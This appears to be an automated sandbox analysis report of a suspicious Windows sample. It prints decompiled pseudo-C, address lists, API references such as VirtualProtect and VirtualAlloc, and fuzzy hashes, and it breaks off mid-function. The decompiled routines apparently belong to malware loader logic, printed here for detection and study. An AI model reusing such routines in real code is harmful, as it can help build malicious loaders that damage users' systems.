0x6e241167
0x6e24116e
0x6e241171
0x6e241179
0x6e24117a
0x6e24117b
0x6e241182
0x6e241186
0x6e24118c
0x6e241190
0x6e241192
0x6e241196
0x6e241199
0x6e2411a0
0x6e2411a3
0x6e2411a6
0x6e2411ab
0x6e2411c1
0x6e2411ad
0x6e2411b7
0x6e2411b9
0x6e2411bc
0x6e2411bc
0x6e2411c8
0x6e2411c8
0x6e2411c8
0x6e2411a0
0x6e2411d3
0x6e2411d6
0x6e2411d9
0x6e2411e0
0x6e2411e6
0x6e2411ea
0x6e2411f9
0x6e24120e
0x6e2411fb
0x6e241204
0x6e241209
0x6e24121f
0x6e24121f
0x6e24122e
0x6e241234

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,00000000), ref: 6E24113E
memcpy.NTDLL(?,?,?,?,?,?,00000000), ref: 6E241204
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,00000000), ref: 6E24121F

Strings

May 5 2021, xrefs: 6E241171

Memory Dump Source

Source File: 00000000.00000002.480384198.000000006E241000.00000020.00020000.sdmp, Offset: 6E240000, based on PE: true

Associated: 00000000.00000002.480363344.000000006E240000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.480398487.000000006E243000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.480413214.000000006E245000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.480434274.000000006E246000.00000002.00020000.sdmp Download File

Similarity

API ID: Virtual$AllocFreememcpy
String ID: May 5 2021
API String ID: 4010158826-1965333733
Opcode ID: bdfebce2ff658fba81f935d2ca0e9133bd7fe05cb95b8219e89fdde37f94ba95
Instruction ID: 0b76baa9a1d62a72a5e01c1788d979bbcfe1b4f9f9b981fa1a0e38ed5ebffe59
Opcode Fuzzy Hash: bdfebce2ff658fba81f935d2ca0e9133bd7fe05cb95b8219e89fdde37f94ba95
Instruction Fuzzy Hash: 35414AB1E0021EDFDB09CFD9C884ADEBBB6BF45314F188129D904BB244C774AA59CB90

Uniqueness

Uniqueness Score: -1.00%

Function 001D907D, Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(80000002), ref: 001D90DA
SysAllocString.OLEAUT32(001D4010), ref: 001D911E
SysFreeString.OLEAUT32(00000000), ref: 001D9132
SysFreeString.OLEAUT32(00000000), ref: 001D9140

Memory Dump Source

Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp Download File

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 68ff543be5ee95a035eb84b1ae19220d3b12b45dffc98037f421b4a95ba45d58
Instruction ID: 2fa4b1a499fbe7d9e75a45eb25b6de515db043e8d6019845da1dc02ba030a32f
Opcode Fuzzy Hash: 68ff543be5ee95a035eb84b1ae19220d3b12b45dffc98037f421b4a95ba45d58
Instruction Fuzzy Hash: C631F87690120AEFCB05DF98D8C48AE7BB9FF58350F20842BF9069B250D7319A81CF61

Uniqueness

Uniqueness Score: -1.00%

Function 001D6BC0, Relevance: 6.1, APIs: 4, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E001D6BC0(char* __eax) {
				char* _t8;
				intOrPtr _t12;
				char* _t21;
				signed int _t23;
				char* _t24;
				signed int _t26;
				void* _t27;

				_t21 = __eax;
				_push(0x20);
				_t23 = 1;
				_push(__eax);
				while(1) {
					_t8 = StrChrA();
					if(_t8 == 0) {
						break;
					}
					_t23 = _t23 + 1;
					_push(0x20);
					_push( &(_t8[1]));
				}
				_t12 = E001D7E20(_t23 << 2);
				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
				if(_t12 != 0) {
					StrTrimA(_t21, 0x1dc2a4); // executed
					_t26 = 0;
					do {
						_t24 = StrChrA(_t21, 0x20);
						if(_t24 != 0) {
							 *_t24 = 0;
							_t24 =  &(_t24[1]);
							StrTrimA(_t24, 0x1dc2a4);
						}
						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
						_t26 = _t26 + 1;
						_t21 = _t24;
					} while (_t24 != 0);
					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
				}
				return 0;
			}

0x001d6bcb
0x001d6bcf
0x001d6bd1
0x001d6bd2
0x001d6bda
0x001d6bda
0x001d6bde
0x00000000
0x00000000
0x001d6bd5
0x001d6bd6
0x001d6bd9
0x001d6bd9
0x001d6be6
0x001d6beb
0x001d6bf1
0x001d6bf9
0x001d6bff
0x001d6c01
0x001d6c06
0x001d6c0a
0x001d6c0c
0x001d6c0f
0x001d6c16
0x001d6c16
0x001d6c20
0x001d6c23
0x001d6c24
0x001d6c26
0x001d6c32
0x001d6c32
0x001d6c3f

APIs

StrChrA.SHLWAPI(?,00000020,00000000,02FA95AC,?,001D5D85,?,001D8097,02FA95AC,?,001D5D85), ref: 001D6BDA
StrTrimA.KERNELBASE(?,001DC2A4,00000002,?,001D5D85,?,001D8097,02FA95AC,?,001D5D85), ref: 001D6BF9
StrChrA.SHLWAPI(?,00000020,?,001D5D85,?,001D8097,02FA95AC,?,001D5D85), ref: 001D6C04
StrTrimA.SHLWAPI(00000001,001DC2A4,?,001D5D85,?,001D8097,02FA95AC,?,001D5D85), ref: 001D6C16

Memory Dump Source

Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp Download File

Similarity

API ID: Trim
String ID:
API String ID: 3043112668-0
Opcode ID: a070ce36ac91a94c1485cb80a0b8217fb2974cb020dacc47f5dc6326a739c4ef
Instruction ID: 4fe9a2e98effe206f43bc85f82a129bdb758a4719413580be6d266d47834e19e
Opcode Fuzzy Hash: a070ce36ac91a94c1485cb80a0b8217fb2974cb020dacc47f5dc6326a739c4ef
Instruction Fuzzy Hash: 760175717063365FD3219F59DC49F27BB98EB95BA4F11051AF881C7340DB65CC0186A5

Uniqueness

Uniqueness Score: -1.00%

Function 6E24173D, Relevance: 6.0, APIs: 4, Instructions: 30
threadCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E6E24173D(void* __ecx, char _a4) {
				long _t3;
				int _t4;
				int _t9;
				void* _t13;

				_t13 = GetCurrentThread();
				_t3 = SetThreadAffinityMask(_t13, 1); // executed
				if(_t3 != 0) {
					SetThreadPriority(_t13, 0xffffffff); // executed
				}
				_t4 = E6E241237(_a4); // executed
				_t9 = _t4;
				if(_t9 == 0) {
					SetThreadPriority(_t13, _t4);
				}
				asm("lock xadd [eax], ecx");
				return _t9;
			}

0x6e241746
0x6e24174b
0x6e241759
0x6e24175e
0x6e24175e
0x6e241764
0x6e241769
0x6e24176d
0x6e241771
0x6e241771
0x6e24177b
0x6e241784

APIs

GetCurrentThread.KERNEL32 ref: 6E241740
SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 6E24174B
SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 6E24175E
SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 6E241771

Memory Dump Source

Source File: 00000000.00000002.480384198.000000006E241000.00000020.00020000.sdmp, Offset: 6E240000, based on PE: true

Associated: 00000000.00000002.480363344.000000006E240000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.480398487.000000006E243000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.480413214.000000006E245000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.480434274.000000006E246000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread$Priority$AffinityCurrentMask
String ID:
API String ID: 1452675757-0
Opcode ID: 6f9d3aed27e600e81e865040d1a2594262be4b360a273502c29b95497fef6e26
Instruction ID: 0a9c71bdad333aa6784129af115eecc473885de7ef0429ec622e5bda580d9050
Opcode Fuzzy Hash: 6f9d3aed27e600e81e865040d1a2594262be4b360a273502c29b95497fef6e26
Instruction Fuzzy Hash: ABE09B35306A15DBA6067A79CC8CE6B775EEF86371B014336F520D21D0CBD08D16C5B5

Uniqueness

Uniqueness Score: -1.00%

Function 6E27FB70, Relevance: 4.7, APIs: 3, Instructions: 242COMMON

Download Yara Rule

APIs

SetConsoleOutputCP.KERNELBASE(000004E3,6E2B35D0,?,?,?,?), ref: 6E27FBC6
SetConsoleCP.KERNELBASE(000004E3,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6E281971), ref: 6E27FC8D
GetCurrentDirectoryW.KERNEL32(00000869,6E2CA9E0,?), ref: 6E27FD2E

Memory Dump Source

Source File: 00000000.00000002.480497623.000000006E250000.00000020.00020000.sdmp, Offset: 6E250000, based on PE: false

Similarity

API ID: Console$CurrentDirectoryOutput
String ID:
API String ID: 487666016-0
Opcode ID: 99975087a13e0351b92859332c4ee97f42ed497cb8a428656f95825412ce88dc
Instruction ID: efb2811a50fa0f44f337d6bfd6a6f2c99a20e1b80aa8b33d974e47c1bd2a2a14
Opcode Fuzzy Hash: 99975087a13e0351b92859332c4ee97f42ed497cb8a428656f95825412ce88dc
Instruction Fuzzy Hash: ED91D171E04A058FDF64CF7CC98C6567BA3BF86308F104A29EA4987389D6F0A945CB61

Uniqueness

Uniqueness Score: -1.00%

Function 001D579B, Relevance: 4.6, APIs: 3, Instructions: 94
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E001D579B(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E001DA762(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x1dd2a4; // 0x2dca5a8
				_t4 = _t24 + 0x1dede0; // 0x2fa9388
				_t5 = _t24 + 0x1ded88; // 0x4f0053
				_t26 = E001D4B9D( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x1dd2a4; // 0x2dca5a8
						_t11 = _t32 + 0x1dedd4; // 0x2fa937c
						_t48 = _t11;
						_t12 = _t32 + 0x1ded88; // 0x4f0053
						_t52 = E001D8FE0(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0x1dd2a4; // 0x2dca5a8
							_t13 = _t35 + 0x1dee1e; // 0x30314549
							if(E001D450C(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
								_t61 =  *0x1dd25c - 6;
								if( *0x1dd25c <= 6) {
									_t42 =  *0x1dd2a4; // 0x2dca5a8
									_t15 = _t42 + 0x1dec2a; // 0x52384549
									E001D450C(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0x1dd2a4; // 0x2dca5a8
							_t17 = _t38 + 0x1dee18; // 0x2fa93c0
							_t18 = _t38 + 0x1dedf0; // 0x680043
							_t45 = E001D27A2(_v8, 0x80000001, _t52, _t18, _t17);
							HeapFree( *0x1dd238, 0, _t52);
						}
					}
					HeapFree( *0x1dd238, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E001D8371(_t54);
				}
				return _t45;
			}

0x001d579b
0x001d57ab
0x001d57ae
0x001d57b5
0x001d57b7
0x001d57b7
0x001d57ba
0x001d57bf
0x001d57c6
0x001d57d3
0x001d57d8
0x001d57dc
0x001d57ea
0x001d57f8
0x001d57fc
0x001d588d
0x001d588d
0x001d5802
0x001d5802
0x001d5807
0x001d5807
0x001d580e
0x001d581a
0x001d581c
0x001d581e
0x001d5820
0x001d5827
0x001d5839
0x001d583b
0x001d5842
0x001d5844
0x001d584b
0x001d5856
0x001d5856
0x001d5842
0x001d585b
0x001d5860
0x001d5867
0x001d5885
0x001d5887
0x001d5887
0x001d581e
0x001d5899
0x001d5899
0x001d589b
0x001d58a0
0x001d58a2
0x001d58a2
0x001d58ad

APIs

StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,02FA9388,00000000,?,74B5F710,00000000,74B5F730), ref: 001D57EA
HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,02FA93C0,?,00000000,30314549,00000014,004F0053,02FA937C), ref: 001D5887
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,001D8522), ref: 001D5899

Memory Dump Source

Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 9c7b31553a10d77b960f57770f9850c746e1bb556473d7d2d17cc8c1095ebb9a
Instruction ID: fc924e0838e79f39f4cff222cbf658ff9037bda7bb0a3a99f8accdba4527dd36
Opcode Fuzzy Hash: 9c7b31553a10d77b960f57770f9850c746e1bb556473d7d2d17cc8c1095ebb9a
Instruction Fuzzy Hash: 62318F32901519BFDB11EBD1EC84EAA7BBEEF54700F2400A7B505AB2A1D770DE45DB50

Uniqueness

Uniqueness Score: -1.00%

Function 001D8A1D, Relevance: 4.6, APIs: 3, Instructions: 76
memoryCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E001D8A1D(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				void* _v8;
				void* __edi;
				intOrPtr _t18;
				void* _t24;
				void* _t30;
				void* _t36;
				void* _t40;
				intOrPtr _t42;

				_t36 = __edx;
				_t32 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t42 =  *0x1dd340; // 0x2fa9928
				_push(0x800);
				_push(0);
				_push( *0x1dd238);
				if( *0x1dd24c >= 5) {
					if(RtlAllocateHeap() == 0) {
						L6:
						_t30 = 8;
						L7:
						if(_t30 != 0) {
							L10:
							 *0x1dd24c =  *0x1dd24c + 1;
							L11:
							return _t30;
						}
						_t44 = _a4;
						_t40 = _v8;
						 *_a16 = _a4;
						 *_a20 = E001D46F9(_t44, _t40);
						_t18 = E001D4245(_t40, _t44);
						if(_t18 != 0) {
							 *_a8 = _t40;
							 *_a12 = _t18;
							if( *0x1dd24c < 5) {
								 *0x1dd24c =  *0x1dd24c & 0x00000000;
							}
							goto L11;
						}
						_t30 = 0xbf;
						E001D45F1();
						HeapFree( *0x1dd238, 0, _t40);
						goto L10;
					}
					_t24 = E001D2941(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t13);
					L5:
					_t30 = _t24;
					goto L7;
				}
				if(RtlAllocateHeap() == 0) {
					goto L6;
				}
				_t24 = E001D24B4(_a4, _t32, _t36, _t42,  &_v8,  &_a4, _t25); // executed
				goto L5;
			}

0x001d8a1d
0x001d8a1d
0x001d8a20
0x001d8a21
0x001d8a2b
0x001d8a32
0x001d8a37
0x001d8a39
0x001d8a3f
0x001d8a67
0x001d8a7f
0x001d8a81
0x001d8a82
0x001d8a84
0x001d8ac2
0x001d8ac2
0x001d8ac8
0x001d8ace
0x001d8ace
0x001d8a86
0x001d8a8c
0x001d8a8f
0x001d8a9e
0x001d8aa0
0x001d8aa7
0x001d8adb
0x001d8ae0
0x001d8ae2
0x001d8ae4
0x001d8ae4
0x00000000
0x001d8ae2
0x001d8aa9
0x001d8aae
0x001d8abc
0x00000000
0x001d8abc
0x001d8a76
0x001d8a7b
0x001d8a7b
0x00000000
0x001d8a7b
0x001d8a49
0x00000000
0x00000000
0x001d8a58
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,00000800,74B5F710), ref: 001D8A41

Part of subcall function 001D24B4: GetTickCount.KERNEL32 ref: 001D24C8
Part of subcall function 001D24B4: wsprintfA.USER32 ref: 001D2518
Part of subcall function 001D24B4: wsprintfA.USER32 ref: 001D2535
Part of subcall function 001D24B4: wsprintfA.USER32 ref: 001D2561
Part of subcall function 001D24B4: HeapFree.KERNEL32(00000000,?), ref: 001D2573
Part of subcall function 001D24B4: wsprintfA.USER32 ref: 001D2594
Part of subcall function 001D24B4: HeapFree.KERNEL32(00000000,?), ref: 001D25A4
Part of subcall function 001D24B4: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001D25D2
Part of subcall function 001D24B4: GetTickCount.KERNEL32 ref: 001D25E3

RtlAllocateHeap.NTDLL(00000000,00000800,74B5F710), ref: 001D8A5F
HeapFree.KERNEL32(00000000,00000002,001D856D,?,001D856D,00000002,?,?,001D5DBE,?), ref: 001D8ABC

Memory Dump Source

Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp Download File

Similarity

API ID: Heap$wsprintf$AllocateFree$CountTick
String ID:
API String ID: 1676223858-0
Opcode ID: 494c3fcfac4b6cabe12f905317695ad8fd26db536654c8a2c8554ffb5660db77
Instruction ID: 01d26b2211c1fda837d3eef459bd2b8e5f23272b0957a44414b36b098bc80d7d
Opcode Fuzzy Hash: 494c3fcfac4b6cabe12f905317695ad8fd26db536654c8a2c8554ffb5660db77
Instruction Fuzzy Hash: D1212C76202215EBCB119F99EC44AAA37BCEB58344F144127F902DB251DB70ED85DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E241E32, Relevance: 4.6, APIs: 3, Instructions: 68
memoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E6E241E32(void* __eax, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				int _t43;
				long _t54;
				signed int _t57;
				void* _t58;
				signed int _t60;

				_v12 = _v12 & 0x00000000;
				_t57 =  *0x6e244140;
				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v16 =  *(__eax + 6) & 0x0000ffff;
				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x63699bbf,  &_v20); // executed
				_v8 = _v8 & 0x00000000;
				if(_v16 <= 0) {
					L12:
					return _v12;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t60 = _v12;
					if(_t60 != 0) {
						goto L12;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						asm("bt [esi+0x24], eax");
						if(__eflags >= 0) {
							L8:
							_t54 = _t57 - 0x63699bbf;
							L9:
							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
							if(_t43 == 0) {
								_v12 = GetLastError();
							}
							_v8 = _v8 + 1;
							_t58 = _t58 + 0x777fa9b0 + _t57 * 0x28;
							if(_v8 < _v16) {
								continue;
							} else {
								goto L12;
							}
						}
						asm("bt [esi+0x24], eax");
						_t54 = _t57 - 0x63699bc1;
						if(__eflags >= 0) {
							goto L9;
						}
						goto L8;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						_t54 = _t57 - 0x63699ba3;
					} else {
						_t54 = _t57 - 0x63699b83;
					}
					goto L9;
				}
				goto L12;
			}

0x6e241e3c
0x6e241e49
0x6e241e4f
0x6e241e5b
0x6e241e6b
0x6e241e6d
0x6e241e75
0x6e241f0a
0x6e241f11
0x00000000
0x00000000
0x00000000
0x6e241e7b
0x6e241e7b
0x6e241e7b
0x6e241e7f
0x00000000
0x00000000
0x6e241e8b
0x6e241e8f
0x6e241eb3
0x6e241eb7
0x6e241ecb
0x6e241ecb
0x6e241ed1
0x6e241ee0
0x6e241ee4
0x6e241eec
0x6e241eec
0x6e241ef4
0x6e241ef7
0x6e241f04
0x00000000
0x00000000
0x00000000
0x00000000
0x6e241f04
0x6e241ebf
0x6e241ec3
0x6e241ec9
0x00000000
0x00000000
0x00000000
0x6e241ec9
0x6e241e97
0x6e241e9b
0x6e241ea5
0x6e241e9d
0x6e241e9d
0x6e241e9d
0x00000000
0x6e241e9b
0x00000000

APIs

VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,?), ref: 6E241E6B
VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6E241EE0
GetLastError.KERNEL32 ref: 6E241EE6

Memory Dump Source

Source File: 00000000.00000002.480384198.000000006E241000.00000020.00020000.sdmp, Offset: 6E240000, based on PE: true

Associated: 00000000.00000002.480363344.000000006E240000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.480398487.000000006E243000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.480413214.000000006E245000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.480434274.000000006E246000.00000002.00020000.sdmp Download File

Similarity

API ID: ProtectVirtual$ErrorLast
String ID:
API String ID: 1469625949-0
Opcode ID: a40fc3e79eca7307466b4bccd1715c878618ef6f9aa547809a2c140ddd36ea04
Instruction ID: fff6fe07eeada4d96e0de1d717685f1c788836afc29f943c46734efcb10db9ab
Opcode Fuzzy Hash: a40fc3e79eca7307466b4bccd1715c878618ef6f9aa547809a2c140ddd36ea04
Instruction Fuzzy Hash: C6217136D0020BDFDB19DF95C885EAAF7F6FF04319F004859D10697485E3B8A6A9CB50

Uniqueness

Uniqueness Score: -1.00%

Function 001D620F, Relevance: 3.9, APIs: 3, Instructions: 154
stringCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E001D620F(void* __eflags, int _a4) {
				intOrPtr _v12;
				WCHAR* _v16;
				char* _v20;
				int _v24;
				void* _v36;
				char _v40;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				void _v84;
				char _v88;
				void* __esi;
				intOrPtr _t40;
				int _t45;
				intOrPtr _t50;
				intOrPtr _t52;
				intOrPtr _t67;
				void* _t80;
				WCHAR* _t85;

				_v88 = 0;
				memset( &_v84, 0, 0x2c);
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t40 =  *0x1dd2a4; // 0x2dca5a8
				_t5 = _t40 + 0x1dee40; // 0x410025
				_t85 = E001D662A(_t5);
				_v16 = _t85;
				if(_t85 == 0) {
					_t80 = 8;
					L24:
					return _t80;
				}
				_t45 = StrCmpNIW(_t85, _a4, lstrlenW(_t85)); // executed
				if(_t45 != 0) {
					_t80 = 1;
					L22:
					E001DA5FA(_v16);
					goto L24;
				}
				if(E001DA762(0,  &_a4) != 0) {
					_a4 = 0;
				}
				_t50 = E001D1546(0,  *0x1dd33c);
				_v12 = _t50;
				if(_t50 == 0) {
					_t80 = 8;
					goto L19;
				} else {
					_t52 =  *0x1dd2a4; // 0x2dca5a8
					_t11 = _t52 + 0x1de81a; // 0x65696c43
					_t87 = E001D1546(0, _t11);
					if(_t55 == 0) {
						_t80 = 8;
					} else {
						_t80 = E001D5AF6(_a4, 0x80000001, _v12, _t87,  &_v88,  &_v84);
						E001DA5FA(_t87);
					}
					if(_t80 != 0) {
						L17:
						E001DA5FA(_v12);
						L19:
						_t86 = _a4;
						if(_a4 != 0) {
							E001D8371(_t86);
						}
						goto L22;
					} else {
						if(( *0x1dd260 & 0x00000001) == 0) {
							L14:
							E001D43DF(_v84, _v88,  *0x1dd270, 0);
							_t80 = E001D8B3E(_v88,  &_v80,  &_v76, 0);
							if(_t80 == 0) {
								_v24 = _a4;
								_v20 =  &_v88;
								_t80 = E001D8C8E( &_v40, 0);
							}
							E001DA5FA(_v88);
							goto L17;
						}
						_t67 =  *0x1dd2a4; // 0x2dca5a8
						_t18 = _t67 + 0x1de823; // 0x65696c43
						_t89 = E001D1546(0, _t18);
						if(_t70 == 0) {
							_t80 = 8;
						} else {
							_t80 = E001D5AF6(_a4, 0x80000001, _v12, _t89,  &_v72,  &_v68);
							E001DA5FA(_t89);
						}
						if(_t80 != 0) {
							goto L17;
						} else {
							goto L14;
						}
					}
				}
			}

0x001d6221
0x001d6224
0x001d622b
0x001d6231
0x001d6232
0x001d6233
0x001d6234
0x001d6235
0x001d6236
0x001d623e
0x001d624a
0x001d624c
0x001d6251
0x001d639f
0x001d63a2
0x001d63a6
0x001d63a6
0x001d6263
0x001d626b
0x001d6392
0x001d6393
0x001d6396
0x00000000
0x001d6396
0x001d627d
0x001d627f
0x001d627f
0x001d628a
0x001d628f
0x001d6294
0x001d6381
0x00000000
0x001d629a
0x001d629a
0x001d629f
0x001d62ad
0x001d62b6
0x001d62d9
0x001d62b8
0x001d62ce
0x001d62d0
0x001d62d0
0x001d62dc
0x001d6375
0x001d6378
0x001d6382
0x001d6382
0x001d6387
0x001d6389
0x001d6389
0x00000000
0x001d62e2
0x001d62e9
0x001d632a
0x001d6339
0x001d634f
0x001d6353
0x001d6358
0x001d635e
0x001d636b
0x001d636b
0x001d6370
0x00000000
0x001d6370
0x001d62eb
0x001d62f0
0x001d62fe
0x001d6302
0x001d6325
0x001d6304
0x001d631a
0x001d631c
0x001d631c
0x001d6328
0x00000000
0x00000000
0x00000000
0x00000000
0x001d6328
0x001d62dc

APIs

memset.NTDLL ref: 001D6224

Part of subcall function 001D662A: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,?,?,00000000,001D624A,00410025,00000005,?,00000000), ref: 001D663B
Part of subcall function 001D662A: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000), ref: 001D6658

lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 001D6258
StrCmpNIW.KERNELBASE(00000000,00000000,00000000), ref: 001D6263

Memory Dump Source

Source File: 00000000.00000002.474209712.00000000001D1000.00000020.00000001.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000000.00000002.474153180.00000000001D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474319691.00000000001DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.474385068.00000000001DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.474441406.00000000001DF000.00000002.00000001.sdmp Download File

Similarity

API ID: EnvironmentExpandStrings$lstrlenmemset
String ID:
API String ID: 3817122888-0
Opcode ID: f0bb634d0350fff3cfbdbc5a0d1036c1e86a3dc74ed5a2fa5e7a4d570accd008
Instruction ID: 99f968c6780fdcb3c70254e85dda04b24f2b132caa95fc23a8023833a1d8ddb4
Opcode Fuzzy Hash: f0bb634d0350fff3cfbdbc5a0d1036c1e86a3dc74ed5a2fa5e7a4d570accd008
Instruction Fuzzy Hash: C8412A72A01219BBDB11EFE4DC85AEE7BBCBF18340B104427FA05AB211D775DE458B91

Uniqueness

Uniqueness Score: -1.00%

Function 001D59F9, Relevance: 3.1, APIs: 2, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E001D59F9(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E001D907D(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x1dd2a4; // 0x2dca5a8
						_t20 = _t68 + 0x1de1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E001D666E(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
